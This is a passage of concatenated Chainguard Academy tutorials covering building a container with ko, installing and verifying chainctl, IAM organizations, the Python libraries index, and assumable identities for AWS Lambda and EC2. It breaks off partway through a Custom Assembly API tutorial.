go-digester The go-digester demo uses the go-containerregistry library to print out the digest of the latest build of a Chainguard Container, using go as the default image to pull the digest from, and with an optional parameter to specify a different container image name. If you have Go installed locally, you can run the application with: go run main.go You should obtain output similar to this: The latest digest of the go Chainguard Container is sha256:86178b42db2e32763304e37f4cf3c6ec25b7bb83660dcb985ab603e3726a65a6 We’ll now use ko to build an image that is suitable to run the application defined in main.go. By default, ko uses the cgr.dev/chainguard/static image as the base image for the build. You can override this by setting the KO_DEFAULTBASEIMAGE environment variable to a different base image. Before building the container image, you’ll need to set up the environment variable KO_DOCKER_REPO. This environment variable identifies where ko should push images that it builds. This is usually a remote registry like the GitHub Container registry or Docker Hub, but you can publish to your local machine for testing and demonstration purposes. Run the following command to set the KO_DOCKER_REPO environment variable to your local machine: export KO_DOCKER_REPO=ko.local Next, ensuring that you are in the same directory as your main.go file, run the following command to build the container with ko: ko build . Once you run this command, you’ll receive output similar to the following. 2024/12/06 13:03:14 Using base cgr.dev/chainguard/static:latest@sha256:5ff428f8a48241b93a4174dbbc135a4ffb2381a9e10bdbbc5b9db145645886d5 for go-digester 2024/12/06 13:03:15 git doesn't contain any tags. Tag info will not be available 2024/12/06 13:03:15 Building go-digester for linux/amd64 2024/12/06 13:03:20 Loading ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 2024/12/06 13:03:20 Loaded ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 2024/12/06 13:03:20 Adding tag latest 2024/12/06 13:03:20 Added tag latest ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 At this point, your container is built. Because the output of ko build is an image reference, you can pass it to other tools like Docker. You can learn more about deployment with ko and Kubernetes integration by reading the respective documentation on the official site. We’ll demonstrate running the above built container with Docker. Note: To follow along, be sure that you copy and paste the last line of output from your last command that begins ko.local/go-digester-... docker run --rm ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 Here, you’ll expect to receive the same output as before that shows the digest of the Go container. The latest digest of the go Chainguard Container is sha256:86178b42db2e32763304e37f4cf3c6ec25b7bb83660dcb985ab603e3726a65a6 You can also pass in an optional argument to specify which Chainguard Container to pull the latest digest from: docker run --rm ko.local/go-digester-edc0ed689c7fb820a565f76425bed013:0914a85d803988ab10964323c0cd7b4bf89aed2603f6e8e276f798491c731336 mariadb The latest digest of the mariadb Chainguard Container is sha256:6ba5d792d463b69f93e8d99541384d11b0f9b274e93efdeb91497f8f0aae03d1 Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Go Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### How to Install chainctl URL: https://edu.chainguard.dev/chainguard/chainctl-usage/how-to-install-chainctl/ Last Modified: June 24, 2024 Tags: chainctl, Product The Chainguard command line interface (CLI) tool, chainctl, will help you interact with the account model that Chainguard provides, and enable you to make queries into the state of your Chainguard resources. The tool uses the familiar <context> <noun> <verb> style of CLI interactions. For example, to retrieve a list of all the private Chainguard Containers available to your organization, you can run chainctl images list. Before we begin, let’s move into a temporary directory that we can work in. Be sure you have curl installed, which you can achieve through visiting the curl download docs for your relevant operating system. mkdir ~/tmp && cd $_ There are currently two ways to install chainctl, depending on your operating system and preferences. Install chainctl with Homebrew You can install chainctl for macOS and Linux with the package manager Homebrew. Note that you will need to have the Xcode Command Line Tools installed prior to installing chainctl with Homebrew on macOS. Without these installed, you won’t be able to use Homebrew to install chainctl on your macOS device. If you haven’t already done so, you can install the Xcode Command Line Tools with the following command. xcode-select --install Before installing chainctl with Homebrew, use brew tap to bring in Chainguard’s repositories. brew tap chainguard-dev/tap Next, install chainctl with Homebrew. brew install chainctl You are now ready to use the chainctl command. You can verify that it works correctly in the final section of this guide. Install with curl A platform-agnostic approach to installing chainctl is through using curl. We have specific instructions for Windows users on installing chainctl with curl, but all others can run the following command: curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m | sed 's/aarch64/arm64/')" Move chainctl into your /usr/local/bin directory and elevate its permissions so that it can execute as needed. sudo install -o $UID -g $(id -g) -m 0755 chainctl /usr/local/bin/ At this point, you’ll be able to use the chainctl command. Installing with curl in Windows Powershell As stated previously, you can also use curl install chainctl on Windows systems. Running the following command in PowerShell will download the appropriate .exe file. curl -o chainctl.exe https://dl.enforce.dev/chainctl/latest/chainctl_windows_x86_64.exe It may take several minutes for this operation to complete. Following that you can use chainctl. Be aware that Windows PowerShell does not load commands from the working directory by default so you will need to include .\ before any chainctl commands you run, as in this example. .\chainctl auth login Also, please note that while chainctl commands will generally work, some are not as thoroughly tested on Windows and may not behave as expected. In particular, the chainctl auth configure-docker command is known to cause errors on Windows as of this writing. Verify installation You can verify that everything was set up correctly by checking the chainctl version. chainctl version You should receive output similar to the following. ____ _ _ _ ___ _ _ ____ _____ _ / ___| | | | | / \ |_ _| | \ | | / ___| |_ _| | | | | | |_| | / _ \ | | | \| | | | | | | | | |___ | _ | / ___ \ | | | |\ | | |___ | | | |___ \____| |_| |_| /_/ \_\ |___| |_| \_| \____| |_| |_____| chainctl: Chainguard Control GitVersion: <semver version> GitCommit: <commit hash> GitTreeState: clean BuildDate: <date here> GoVersion: <compiler version> Compiler: gc Platform: <your platform> If you received output that you did not expect, check your bash profile to make sure that your system is using the expected PATH. Verifying the chainctl binary with Cosign You can verify the integrity of your chainctl binary using Cosign. Ensure that you have the latest version of Cosign installed by following our How to Install Cosign guide. Verify your chainctl binary with the following command: VERSION=$(chainctl version 2>&1 | awk '/GitVersion/ {print $2}' | sed 's/^v//') cosign verify-blob \ --signature "https://dl.enforce.dev/chainctl/${VERSION}/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m).sig" \ --certificate "https://dl.enforce.dev/chainctl/${VERSION}/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m).cert.pem" \ --certificate-identity "https://github.com/chainguard-dev/mono/.github/workflows/.release-drop.yaml@refs/tags/v${VERSION}" \ --certificate-oidc-issuer https://token.actions.githubusercontent.com \ $(which chainctl) You should receive the following output: Verified OK If you do not see the line Verified OK then there is a problem with your chainctl binary and you should reinstall it using the instructions at the beginning of this page. Authenticating With chainctl installed, you can authenticate into Chainguard with the following command: chainctl auth login This will open your browser window and take you through a workflow to login with your OIDC provider. Configure a Docker credential helper You can configure a Docker credential helper with chainctl by running: chainctl auth configure-docker This will update your Docker config file to call chainctl when an auth token is needed. A browser window will open when the token needs to be refreshed. For guidance on pull tokens, please review authenticating with a pull token. Updating chainctl When your version of chainctl is a few weeks old or older, you may consider updating it to make sure that your version is the most up to date. You can update chainctl by running the update command. sudo chainctl update Keeping chainctl up to date will ensure that you are using the most up to date version. --- ### How to Manage Chainguard IAM Organizations URL: https://edu.chainguard.dev/chainguard/administration/iam-organizations/how-to-manage-iam-organizations-in-chainguard/ Last Modified: April 3, 2024 Tags: Product, Procedural Chainguard provides a rich Identity and Access Management (IAM) model similar to those used by AWS and GCP. This guide outlines how to manage Chainguard’s IAM structures with the chainctl command line tool. Note: You should work with Chainguard’s Customer Success team to create or delete organizations. This will help to ensure that no users lose access to resources and that your IAM structure is configured correctly. Logging in To authenticate into the Chainguard platform, run the following login command. chainctl auth login A web browser window will open to prompt you to log in via your chosen OIDC flow. Select an account with which you wish to register. Once authenticated, you can set up an organization. Listing Organizations At any time, you can list the organizations your account has access to by using the list subcommand. To make it more human readable, you can output the information as a table by passing -o table to the end of the command. chainctl iam organizations list You’ll get output regarding each of the organizations the user you’re logged in as belongs to, including a description of each organization, if available. [demo-org] This is a shared IAM organization for running demos [tutorial-org] This is a shared IAM organization for tutorials. You can retrieve your organizations’ UIDPs by adding the -o table option to the previous list command. chainctl iam organizations list -o table ID | NAME | DESCRIPTION ----------------------+--------------+--------------------------------- <Organization UIDP> | tutorial-org | This is a shared IAM | | organization for tutorials. <Organization UIDP> | demo-org | This is a shared IAM | | organization for running demos Some other chainctl functions require you to know an organization’s UIDP, making this a useful option to remember. Inviting Others to an Organization You can use chainctl to generate invite codes in order to invite others to a specific organization. To do so, run the following command, making sure to replace $ORGANIZATION with the name of your chosen organization. chainctl iam invite create $ORGANIZATION You will be prompted for the scope that the invite code will be granted. After selecting the role-bindings, this command will generate both an invite code and an invite link. If you ever lose the invite code, you can retrieve a list of active invite codes with the following chainctl command: chainctl iam invite list This will provide output in the form of a table with the organization ID, a timestamp indicating when the invitation to the organization will expire, the invite code’s key ID, and the selected role. ID | EXPIRATION | KEYID | ROLE ----------------------+--------------------------+---------------+--------------------------------- <Organization UIDP> | 2024-03-23T00:55:04.813Z | <Invite code> | [editor] Editor Note that this invite code found under the KEYID column will be shorter than the one returned in the output of the chainctl iam invite create command, but they are effectively the same. To invite team members, auditors, or others to your desired organizations, securely distribute the invite code and have them log in with chainctl as follows. chainctl auth login --invite-code $INVITE_CODE You can also securely distribute the invite link and have users open it in their web browser to log in and join the organization. Note that you can tighten the scope of an invite code by including the --email and --ttl flags when creating the invite. chainctl iam invite create $ORGANIZATION --email linky@example.com --ttl 24h In this example, the invitation is scoped to a user with the email address linky@example.com. If someone with a different email address tries to use the code it will not work. The --ttl option in this example means that the code will expire in 24 hours. Learn more In addition to inviting other users to your organization, you can set up assumable identities to allow automation systems — like Buildkite or GitHub Actions — to perform certain administrative tasks for your organization. To learn more, we encourage you to check out our Overview of Assumable Identities as well as our collection of Assumable Identity Examples. You may also be interested in setting up a Custom Identity Provider for your organization. By default, users can log in with GitHub GitLab, and Google, but a Custom IDP can allow members of your organization to log in to Chainguard with a corporate identity provider like Okta, Microsoft Entra ID, or Ping Identity. --- ### Chainguard Libraries for Python Overview URL: https://edu.chainguard.dev/chainguard/libraries/python/overview/ Last Modified: January 1, 0001 Tags: Chainguard Libraries, Python, Overview Introduction Python is one of the most popular programming languages in the world. The open Python Package Index (PyPI) contains over 600,000 libraries for application development, machine learning, data science, and many other use cases. Chainguard Libraries for Python rebuilds these powerful open source projects within the Chainguard Factory, enabling access to the Python ecosystem while dramatically reducing risk from an untrusted software supply chain. Chainguard Libraries for Python enables access to a growing collection of Python packages rebuilt from source. New releases of common libraries or artifacts requested by customers are added to the index by an automated system. Any request for a library or library version missing in Chainguard Libraries automatically triggers a process to provision the artifacts from relevant sources if available. In combination with third-party software repository managers, you can use Chainguard Libraries for Python as a secure source of truth for your development process. Runtime requirements The runtime requirements for Python artifacts available from Chainguard Libraries for Python are identical to the requirements of the original upstream project. For example, if a Python wheel retrieved from PyPI requires Python 3.10 or higher, the same Python 3.10 runtime requirement applies to the binary artifact from Chainguard Libraries for Python. Some Python libraries include Python extensions that depend on native binaries supplied by the operating system or included in the distribution archive. For these libraries the following requirements apply: All Linux distributions must use glibc 2.28 or higher, such as RHEL 8, Ubuntu 20.04, or Amazon Linux 2023. On Windows and MacOS you must use a suitable Linux distribution with a container solution, such as WSL2, apple/container or Docker Desktop. Processor architecture of the runtime environment must be x86_64 or aarch64. Technical details Most organizations consume Chainguard Libraries for Python through a repository manager such as Cloudsmith, JFrog Artifactory or Sonatype Nexus Repository. For full details, refer to our Global Configuration documentation. The rest of this article provides details of the underlying implementation of Chainguard Libraries for Python and how to access individual libraries manually. The Chainguard Libraries for Python index uses the PyPI repository format and only includes release artifacts of the libraries built by Chainguard from source. The URL for the repository is: https://libraries.cgr.dev/python/ Use the URL with your username and password retrieved with chainctl to access the Chainguard Libraries for Python repository manually with a browser. After successful login, you are redirected to the simple sub-context at https://libraries.cgr.dev/python/simple/ that allows you to inspect the available packages. The top level contains an alphabetical list of packages: 2captcha-python 3d-converter absql ahrs amqpstorm annogesic apiflask apscheduler ... A list of all wheels and tarballs for the versions of a specific package is available in the context of the package. For example, the apiflask context at https://libraries.cgr.dev/python/simple/apiflask/ shows the following list: Links for apiflask apiflask-0.1.0-py3-none-any.whl apiflask-0.1.0.tar.gz apiflask-0.10.0-py3-none-any.whl apiflask-0.10.0.tar.gz apiflask-0.10.1-py3-none-any.whl apiflask-0.10.1.tar.gz apiflask-0.11.0-py3-none-any.whl apiflask-0.11.0.tar.gz apiflask-0.12.0-py3-none-any.whl apiflask-0.12.0.tar.gz ... Each package name is a link to the specific binary. The link includes long unique identifiers and cannot be determined without browsing. The list uses ascending order for the full name including the version. Use the search functionality on pypi.org to locate packages of interest and then browse in the simple index to determine available versions in Chainguard Libraries for Python. Use curl, specifying the username and password retrieved with chainctl, and use the URL of the file to download and save the file with the original name: With .netrc authentication: curl -n -L -O https://libraries.cgr.dev/files/... With environment variables: curl -L --user '$CHAINGUARD_PYTHON_IDENTITY_ID:$CHAINGUARD_PYTHON_TOKEN' \ -O https://libraries.cgr.dev/files/... The option -L is required to follow redirects for the actual file locations. The Chainguard Libraries for Python repository does not include all packages from PyPI. Chainguard Libraries for Python are rebuilt from source and require that source be available. Therefore, packages that do not provide a valid source URL cannot be rebuilt within the Chainguard Factory. Since the Chainguard Libraries for Python index is not complete, you should strongly consider setting the PyPI public package index as a fallback within your repository manager. In this case, failed requests are logged by Chainguard and, where possible, the package is prioritized for new build from source. Typically, access is configured globally on a repository manager for your organization. Alternatively, you can use the token for direct access to the Chainguard Libraries for Python index as discussed in Build configuration. --- ### Create an Assumable Identity for an AWS Lambda Role URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/aws-lambda-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then create an AWS role that will assume the identity to interact with Chainguard resources. This can be used to authorize requests from AWS Lambda, ECS, EKS, or any other AWS service that supports IAM roles for service accounts. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. An AWS account with the AWS CLI installed and configured. The Terraform provider for AWS uses credentials configured via the AWS CLI. A recent version of Go to test the identity with AWS Lambda. Creating Terraform Files We will be using Terraform to create an identity for an AWS role to assume. This step outlines how to create the Terraform configuration files that, together, will produce such an identity. These files are available in Chainguard’s GitHub Repository of Platform Examples. To help explain each configuration file’s purpose, we will go over what they do one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/aws-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { aws = { source = "hashicorp/aws" } chainguard = { source = "chainguard-dev/chainguard" } ko = { source = "ko-build/ko" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next we’ll create lambda.tf to define the AWS resources to run the Lambda function, and chainguard.tf to define the Chainguard resources that the Lambda function will interact with. lambda.tf The lambda.tf describes the AWS role that a Lambda function will run as. data "aws_iam_policy_document" "lambda" { statement { effect = "Allow" actions = ["sts:AssumeRole"] principals { type = "Service" identifiers = ["lambda.amazonaws.com"] } } } data "aws_iam_policy" "lambda" { name = "AWSLambdaBasicExecutionRole" } resource "aws_iam_role" "lambda" { name = "aws-auth" assume_role_policy = data.aws_iam_policy_document.lambda.json managed_policy_arns = [data.aws_iam_policy.lambda.arn] } This describes an AWS role that a Lambda function will run as. The Lambda function will assume this role, and then use the Chainguard identity to interact with Chainguard resources. The lambda.tf file also creates an AWS Lambda function that will assume the identity you created in the previous section. This function will then use the identity to interact with Chainguard resources. The final section defines a AWS lambda function implemented in Go that will assume the identity you created in the previous section: resource "aws_lambda_function" "test_lambda" { filename = "lambda_function_payload.zip" function_name = "lambda_function_name" role = aws_iam_role.iam_for_lambda.arn handler = "bootstrap" source_code_hash = data.archive_file.lambda.output_base64sha256 runtime = "go1.x" } Check out this basic example for configuring AWS Lambda using Terraform, and the docs for deploying Go Lambda functions with .zip file archives for more information on how to configure the filename and source_code_hash fields. Below we’ll go over some of the specific details from the example Go application. After it’s deployed, when this function is invoked, it will assume the AWS role you created in the previous section. It will then be able to present credentials as that AWS role that will allow it to assume the Chainguard identity you created in the previous section, to view and manage Chainguard resources. Next, you can create the chainguard.tf file. chainguard.tf chainguard.tf will create a few resources that will help us test out the identity. resource "chainguard_group" "example-group" { name = "example-group" description = <<EOF This organization simulates an end-user organization, which the AWS role identity can interact with via the identity in aws.tf. EOF } This section creates a Chainguard IAM organization named example-group, as well as a description of the organization. This will serve as some data for the identity to access when we test it out later on. Then we’ll define a Chainguard identity that can be assumed by the AWS role created in lambda.tf above: resource "chainguard_identity" "aws" { parent_id = data.chainguard_group.example-group.id name = "aws-auth-identity" description = "Identity for AWS Lambda" aws_identity { aws_account = data.aws_caller_identity.current.account_id aws_user_id_pattern = "^AROA(.*):${local.lambda_name}$" // NB: This role will be assumed so can't use the role ARN directly. We must use the ARN of the assumed role aws_arn = "arn:aws:sts::${data.aws_caller_identity.current.account_id}:assumed-role/${aws_iam_role.lambda.name}/${local.lambda_name}" } } The most important part of this section is the aws_identity block. When the AWS role tries to assume this identity later on, it must present a token matching the aws_account, aws_user_id_pattern, and aws_arn specified here in order to do so. The aws_user_id_pattern field configures the identity to be assumable only by the AWS role with the specified name, which is itself assumed by another execution role, which we’ll configure below. This role will be assumed so can’t use the role ARN directly in aws_arn; We must used the ARN of the assumed role. The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity on the example-group. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.aws.id group = data.chainguard_group.example-group.id role = data.chainguard_role.viewer.items[0].id } After defining these resources, there are some other resources in the example directory that build and deploy a Lambda function that assumes the identity. We’ll describe that code in the next section. After defining these resources, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section. terraform plan Then apply the configuration. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. ... Plan: 8 to add, 0 to change, 0 to destroy. Changes to Outputs: + aws-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After typing yes and pressing ENTER, the command will complete and will output an aws-identity value. ... Apply complete! Resources: 8 added, 0 changed, 0 destroyed. Outputs: aws-identity = "<your identity>" This is the identity’s UIDP (unique identity path), which you configured the chainguard.tf file to emit in the previous section. Note this value down, as you’ll need it to set up the AWS role you’ll use to test the identity. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls Testing the Identity When the AWS Lambda function is invoked, first it needs to get its credentials, which assert that it is the AWS IAM role defined earlier. The example code in Go does this with aws-sdk-go-v2: // Get AWS credentials. cfg, err := config.LoadDefaultConfig(ctx) if err != nil { return "", fmt.Errorf("failed to load configuration, %w", err) } creds, err := cfg.Credentials.Retrieve(ctx) if err != nil { return "", fmt.Errorf("failed to retrieve credentials, %w", err) } These credentials represent the AWS role assumed by the Lambda function ("aws-auth" defined above in lambda.tf). You can use the Chainguard SDK for Go to generate a token that Chainguard understands, to authenticate the Lambda function as the Chainguard identity you created earlier, by its UIDP: // Generate a token and exchange it for a Chainguard token. awsTok, err := aws.GenerateToken(ctx, creds, env.Issuer, env.Identity) if err != nil { return "", fmt.Errorf("generating AWS token: %w", err) } exch := sts.New(env.Issuer, env.APIEndpoint, sts.WithIdentity(env.Identity)) cgtok, err := exch.Exchange(ctx, awsTok) if err != nil { return "", fmt.Errorf("exchanging token: %w", err) } The resulting token, cgtok, can be used to authenticate requests to Chainguard API calls: // Use the token to list repos in the organization. clients, err := registry.NewClients(ctx, env.APIEndpoint, cgtok) if err != nil { return "", fmt.Errorf("creating clients: %w", err) } ls, err := clients.Registry().ListRepos(ctx, &registry.RepoFilter{ Uidp: &common.UIDPFilter{ ChildrenOf: env.Group, }, }) Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding, and the identity created in this guide. However, you’ll need to destroy the example-group organization yourself with chainctl. It will also delete all the AWS resources defined earlier in chainguard.tf and lambda.tf. chainctl iam organizations rm example-group You can then remove the working directory to clean up your system. rm -r ~/aws-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. --- ### Create an Assumable Identity to Authenticate from an EC2 Instance URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/aws-ec2-identity/ Last Modified: March 31, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to access Chainguard resources or perform certain actions. This procedural tutorial outlines how to create a Chainguard identity that can then be assumed by an AWS role and used to authorize requests from an Amazon EC2 instance, allowing you to interact with Chainguard resources remotely. Prerequisites To complete this guide, you will need the following. An Amazon EC2 instance with an IAM Instance role (with or without any AWS permissions). The default sts:AssumeRole is sufficient for this guide. This guide assumes you have the AWS CLI installed on your EC2 instance. Review the official documentation for information on how to install or update to the latest version of the tool. Finally, you’ll need chainctl — the Chainguard command line interface tool — installed on both your EC2 instance and your local machine. Follow our guide on How to Install chainctl to set this up. Create a Chainguard Assumable Identity To get started, you will need to retrieve some details about the AWS IAM user on your EC2 instance. You will use these details to create a Chainguard identity that the EC2 user will employ to authenticate to Chainguard. Run the following command from your EC2 instance: aws sts get-caller-identity This will return information like the following: { "UserId": "AROAWSexampleC2UL7LUB:i-05a6373ad7171fed2", "Account": "453EXAMPLE43", "Arn": "arn:aws:sts::452example43:assumed-role/AmazonSSMRoleForInstancesQuickSetup/i-05a6373examplehd2" } From your local machine, use this information to create a JSON file named id.json which you’ll use to define the identity your EC2 instance will use to authenticate to Chainguard: cat > id.json <<EOF { "name":"aws-ec2-identity", "awsIdentity": { "aws_account" : "$ACCOUNT", "arnPattern" : "$ARN", "userIdPattern" : "$USER-ID" } } EOF Note that this identity definition specifies the name of the Chainguard identity as aws-ec2-identity. Be sure to change these placeholder values to reflect the output from the aws sts get-caller-identity command you ran on your EC2 instance. Next, use chainctl to authenticate to your Chainguard account: chainctl auth login After authenticating to Chainguard, you can create an identity that your EC2 instance will be able to assume. First though, you’ll need to know the name of the Chainguard organization you want the assumable identity to be associated with. To retrieve a list of all the organizations you have access to, run the following command: chainctl iam organizations ls -o table Find the organization you want to use and copy the value from its NAME column exactly. You can then use this to create a new Chainguard identity. The following example uses the id.json file you created earlier as the identity definition and associates it with the chainguard.edu organization: chainctl iam id create aws --filename id.json -oid --parent chainguard.edu Be sure to change the chainguard.edu placeholder to reflect the name of your own Chainguard organization. This command will return a value like the following: . . . 45a0cEXAMPLE977f050c5fb9ac06a69EXAMPLE95/2c5f7EXAMPLE3871 Note this value down, as you will need it in the next section when you authenticate to Chainguard from your EC2 instance using this identity. Before moving on, you must create a role-binding to bind the identity stored in $CHAINGUARD_IDENTITY to a specific role: chainctl iam rolebinding create --identity aws-ec2-identity --role viewer --parent chainguard.edu This example binds the aws-ec2-identity to the viewer role, but you can bind it to any role you’d like. For a full list of available roles, you can run the chainctl iam roles list command. Again, be sure to change chainguard.edu to reflect the name of your own organization, and change aws-ec2-identity to the name of the identity you created previously, if different. Following that, you can move on to the next section where you will authenticate to Chainguard from your EC2 instance using the identity you created. Authenticate from EC2 Using the Newly Created Identity Now that you’ve created a Chainguard identity, you can use it to connect to Chainguard from your EC2 instance. This section outlines how to set this up. Note: All the commands in this section should be run from your EC2 instance. From your EC2 instance, create an environment variable named $CHAINGUARD_IDENTITY that contains the ID value for the aws-ec2-identity Chainguard identity you created in the previous section: export CHAINGUARD_IDENTITY=45a0cEXAMPLE977f050c5fb9ac06a69EXAMPLE95/2c5f7EXAMPLE3871 If you forgot to note down the identity’s ID value, you can retrieve a list of all your available Chainguard identities (along with their ID values) by running the chainctl iam identities list -o table command on your local machine. Next you’ll need to get the EC2 instance’s credentials from the Instance Metadata Service. To do this, first create a session token with the following command: TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") This creates a session token that will last for six hours (21600 seconds) and stores the token header in a variable named $TOKEN. Next, you’ll need to find the role associated with the instance. The following command retrieves this role while storing it in a variable named $ROLE: ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/meta-data/iam/security-credentials/) Following that, you can run a nearly identical command to retrieve the necessary security credentials, this time without storing the results in an environment variable and specifying the IAM role you just retrieved: curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE This will return output like the following: { "Code": "Success", "LastUpdated": "2025-03-13T23:05:07Z", "Type": "AWS-HMAC", "AccessKeyId": "ASEXAMPLE3EFACCESS3KEYS", "SecretAccessKey": "gFQYvEXAMPLEqlISECRETdgACCESSdzlZlKEY56h", "Token": "IQoJb3JpZ2luXEXAMPLE2Vj. . .", "Expiration": "2025-03-14T05:29:15Z" } Based on this output, create three environment variables: $AWS_ACCESS_KEY_ID, which will hold the AccessKeyId value $AWS_SECRET_ACCESS_KEY, which will hold the SecretAccessKey value $AWS_SESSION_TOKEN, to hold the Token value export AWS_ACCESS_KEY_ID="ASEXAMPLE3EFACCESS3KEYS" export AWS_SECRET_ACCESS_KEY="gFQYvEXAMPLEqlISECRETdgACCESSdzlZlKEY56h" export AWS_SESSION_TOKEN="IQoJb3JpZ2luXEXAMPLE2Vj. . ." Note: You can retrieve the security credentials and store them the appropriate variables with the following one-line command, which will reduce the amount of copying and pasting you need to do: curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE | jq -j '"export AWS_ACCESS_KEY_ID=", .AccessKeyId, "\nexport AWS_SECRET_ACCESS_KEY=", .SecretAccessKey,"\nexport AWS_SESSION_TOKEN=" , .Token' > vars && source ./vars Using these variables, as well as the Chainguard identity you set up previously, you can send a request to the AWS Security Token Service to retrieve a short-lived token which will be used to authenticate with chainctl. This command stores the token in a variable named $TOK: TOK=$(curl -X POST "https://sts.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15" \ --aws-sigv4 "aws:amz:us-east-1:sts" \ -H "x-amz-security-token: $AWS_SESSION_TOKEN" \ --user "$AWS_ACCESS_KEY_ID":"$AWS_SECRET_ACCESS_KEY" \ -H "Chainguard-Identity: $CHAINGUARD_IDENTITY" \ -H "Chainguard-Audience: https://issuer.enforce.dev" \ -H "Accept: application/json" \ -v 2>&1 > /dev/null | grep '^> ' | sed 's/> //' | base64 -w0) Finally, use this token — along with the $CHAINGUARD_IDENTITY variable — to authenticate to Chainguard from your EC2 instance: chainctl auth login --identity-token $TOK --identity $CHAINGUARD_IDENTITY Successfully exchanged token. Valid! Id: 45a0cEXAMPLE977f050c5fb9ac06a69EXAMPLE95/2c5f7EXAMPLE3871 With that, your EC2 instance will have access to your Chainguard resources. Remember that the level of access is determined by the role you bound to the identity in the previous section; if you followed this example closely, then this identity will be bound to the viewer role. Learn more By following this guide, you will have created a Chainguard identity that you can use to authenticate to Chainguard from an Amazon EC2 instance. For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, we encourage you to read through the rest of our documentation on Administering Chainguard resources. --- ### Using the Chainguard API to Manage Custom Assembly Resources URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/ca-docs/custom-assembly-api-demo/ Last Modified: May 1, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s Custom Assembly is a tool that allows customers to create customized containers with extra packages added. This enables customers to reduce their risk exposure by creating container images that are tailored to their internal organization and application requirements while still having few-to-zero CVEs. You can use the Chainguard API to further customize your Custom Assembly builds and retrieve information about them. This tutorial highlights a demo application (which can be found in Chainguard Academy’s Demo Applications repository) which, when run, updates a Custom Assembly container’s configuration based on a provided YAML file. Prerequisites In order to follow along with this guide, you will need the following: Access to a Custom Assembly container image. If your organization doesn’t yet have access to Custom Assembly, reach out to your account team to start the process. The demo application used in this guide is written in Go, so you will need Go installed on your local machine. Refer to the official Go documentation for instructions on downloading and installing Go. You will also need chainctl installed on your local machine to create a Chainguard token and authenticate to the Chainguard API. Downloading the Demo Application This step involves downloading the demo application code to your local machine. To ensure that the application files don’t remain on your system, navigate to a temporary directory like /tmp/: cd /tmp/ Your system will automatically delete the /tmp/ directory’s contents the next time it shuts down or reboots. The code that comprises this demo application is hosted in a public GitHub repository managed by Chainguard. Pull down the example application files from GitHub with the following command: git clone --sparse https://github.com/chainguard-dev/edu-images-demos.git Because this guide’s demo application code is stored in a repository with other examples, we don’t need to pull down every file from this repository. For this reason, this command includes the --sparse option. This initializes a sparse-checkout file, causing the working directory to contain only the files in the root of the repository until the sparse-checkout configuration is modified. Navigate into this new directory and list its contents to confirm this: cd edu-images-demos/ && ls For now, this directory only contains the repository’s LICENSE and README files: LICENSE README.md To retrieve the files you 